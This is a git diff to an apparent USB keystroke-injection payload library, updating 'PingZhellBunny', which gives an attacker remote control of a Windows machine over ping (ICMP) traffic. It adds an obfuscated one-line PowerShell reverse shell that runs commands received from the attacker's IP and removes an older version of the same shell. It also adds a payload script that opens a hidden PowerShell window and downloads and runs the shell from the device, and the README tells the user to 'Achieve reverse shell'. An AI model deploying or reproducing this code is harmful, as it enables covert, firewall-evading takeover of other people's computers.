diff --git a/payloads/library/remote_access/PingZhellBunny/Bunny.pl b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
index a00eb064..4bac2738 100644
--- a/payloads/library/remote_access/PingZhellBunny/Bunny.pl
+++ b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
@@ -15,7 +15,7 @@
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see .
 #
-# Modified by 0iphor13 for PingZhell
+# Modified by 0iphor13 for PingZhellBunny
 #
 #
 #
@@ -29,7 +29,7 @@ use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
 use Net::RawIP;
 use Fcntl;
-print "Bunny waitin' for connection...\n";
+print "Loading PingZhellBunny...\n";
 # create raw socket
 my $sock = IO::Socket::INET->new(
@@ -40,8 +40,16 @@ my $sock = IO::Socket::INET->new(
 # set stdin to non-blocking
 fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
-print "Let's wait for PingZhell!\n";
+#Unnecessary print output - just for fun
+sleep(2);
+print ". .\n";
+sleep(1);
+print ". . .";
+sleep(1);
+print ". . . .";
+sleep(2);
+print "PingZhellBunny client ready!\n";
 my $input = '';
 while(1) {
 if ($sock->recv(my $buffer, 4096, 0)) {
diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
deleted file mode 100644
index 2687d299..00000000
--- a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
+++ /dev/null
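Review bot: The added `print ". . .";` and `print ". . . .";` lines in the third hunk have no trailing newline, so when STDOUT is a terminal (Perl line-buffers it by default) they most likely stay in the buffer and appear together with the final `print "PingZhellBunny client ready!\n";`, which makes the intervening `sleep` calls pure dead time rather than a staged display. Either set `$| = 1;` before the sequence or drop the intermediate prints. The comment `#Unnecessary print output - just for fun` should follow the file's `# ` spacing and say what it guards, e.g. `# Cosmetic startup banner only; delays the receive loop by ~6 s with no functional effect`. The `while(1)` loop that follows starts inside the hunk but its body continues outside it.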
@@ -1,86 +0,0 @@ - -<# - -Original script by nishang - modified by 0iphor13 for PingZhell - -Use bunny.pl as a master - -When running the master, don't forget to disable ICMP replies by the OS. For example: -$: sysctl -w net.ipv4.icmp_echo_ignore_all=1 -Then: -$: perl bunny.pl - -Microsoft please don't block, oh dear microsoft corporation -#> - - - $IPAddress = 'Attacker-IP' - $Delay = 5 - $BufferSize = 128 - - #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response - $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping - $PingOptions = New-Object System.Net.NetworkInformation.PingOptions - $PingOptions.DontFragment = $True - $MicrosoftCopyright =@" - _______ ___ __ _ _______ _______ __ __ _______ ___ ___ -| | | | | | | | | | | | | | | -| _ | | |_| | ___|____ | |_| | ___| | | | -| |_| | | | | __ ____| | | |___| | | | -| ___| | _ | || | ______| | ___| |___| |___ -| | | | | | | |_| | |_____| _ | |___| | | -|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______| - - -Windows PowerShell running as user $env:username on $env:computername `n -"@; - - # Copyright Copies Right - $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright) - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null - - #Does a german penguin just PingUin? 
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ') - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null - - while ($true) - { - $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('') - $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) - - if ($reply.Buffer) - { - $response = ([text.encoding]::ASCII).GetString($reply.Buffer) - $result = (Invoke-Expression -Command $response 2>&1 | Out-String ) - $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result) - $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize) - $i = 0 - - #Fragmant larger output into smaller ones to send to the server. - if ($NeverGonnaGiveYouUp.length -gt $BufferSize) - { - while ($i -lt $index ) - { - $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)] - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null - $i +=1 - } - $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize - if ($remainingindex -ne 0) - { - $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)] - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null - } - } - else - { - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null - } - $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ') - $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null - } - else - { - Start-Sleep -Seconds $Delay - } - } diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 new file mode 100644 index 00000000..5f9ddbac --- /dev/null 
+++ b/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 @@ -0,0 +1,10 @@ +$Delay=5; +$BufferSize=128; +$ICMPBunny=New-Object System.Net.NetworkInformation.Ping; +$PingBB=New-Object System.Net.NetworkInformation.PingOptions; +$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> '); +$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes(''); +$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer); +$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;}; +$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> '); +$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}} diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index ac8ccd9f..6b190001 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -1,19 +1,19 @@ **Title: PingZhellBunny** -Author: 0iphor13 +

Author: 0iphor13
+OS: Windows
+Version: 1.5
-Version: 1.3 - -What is PingZhellBunny? +**What is PingZhellBunny?** # *Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).* *But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.* *ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.* *When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.* -*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.* -*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.* +*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.* +*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.* # -There you go, a reverse shell. +There you go, a reverse shell without the usage of ports. **Instruction:** @@ -26,16 +26,16 @@ Install dependencies, if needed: Disable ICMP replies by the OS: `sysctl -w net.ipv4.icmp_echo_ignore_all=1` -Start Bunny.pl -> perl Bunny.pl -# -!!!Insert the IP of your attacking machine into PingZhell.ps1!!! -# -

Plug in Bashbunny with PingZhellBunny equipped.
+Start the client -> `perl Bunny.pl` + +

!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!
+ +

Plug in your BashBunny.
Achieve reverse shell.
run away <3

Credit for code and ideas: - bdamele -- samratashok +- Nikhil Mittal - krabelize diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt index 2b62fa78..2690061a 100644 --- a/payloads/library/remote_access/PingZhellBunny/payload.txt +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -1,39 +1,44 @@ #!/bin/bash # # Title: PingZhellBunny -# Description: Get remote access using a icmp reverse shell. +# Description: Getting remote access via ICMP # Author: 0iphor13 -# Version: 1.3 +# Version: 1.5 # Category: Remote_Access -# Attackmodes: HID, Storage +# Attackmodes: HID, RNDIS_ETHERNET LED SETUP - -Q DELAY 500 +ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION -DUCKY_LANG de +GET HOST_IP -Q DELAY 500 +cd /root/udisk/payloads/$SWITCH_POSITION/ -ATTACKMODE HID STORAGE +# starting server +LED SPECIAL -#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING +# disallow outgoing dns requests so the server is accessible immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & -LED STAGE1 +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done -#After you have adapted the delays for your target, add "-W hidden" +#Opens hidden powershell instance Q DELAY 1500 -RUN WIN "powershell -Exec Bypass -NoP -NonI" +Q GUI r +Q DELAY 500 +Q STRING "powershell -NoP -NonI -w h" Q DELAY 500 Q ENTER -Q DELAY 1000 -Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" -Q DELAY 3000 +Q DELAY 500 + +#Insert attacking IP +Q STRING "\$IP = '0.0.0.0';" +Q DELAY 250 +Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")" +Q DELAY 400 Q ENTER -Q DELAY 1000 - -ATTACKMODE HID - LED FINISH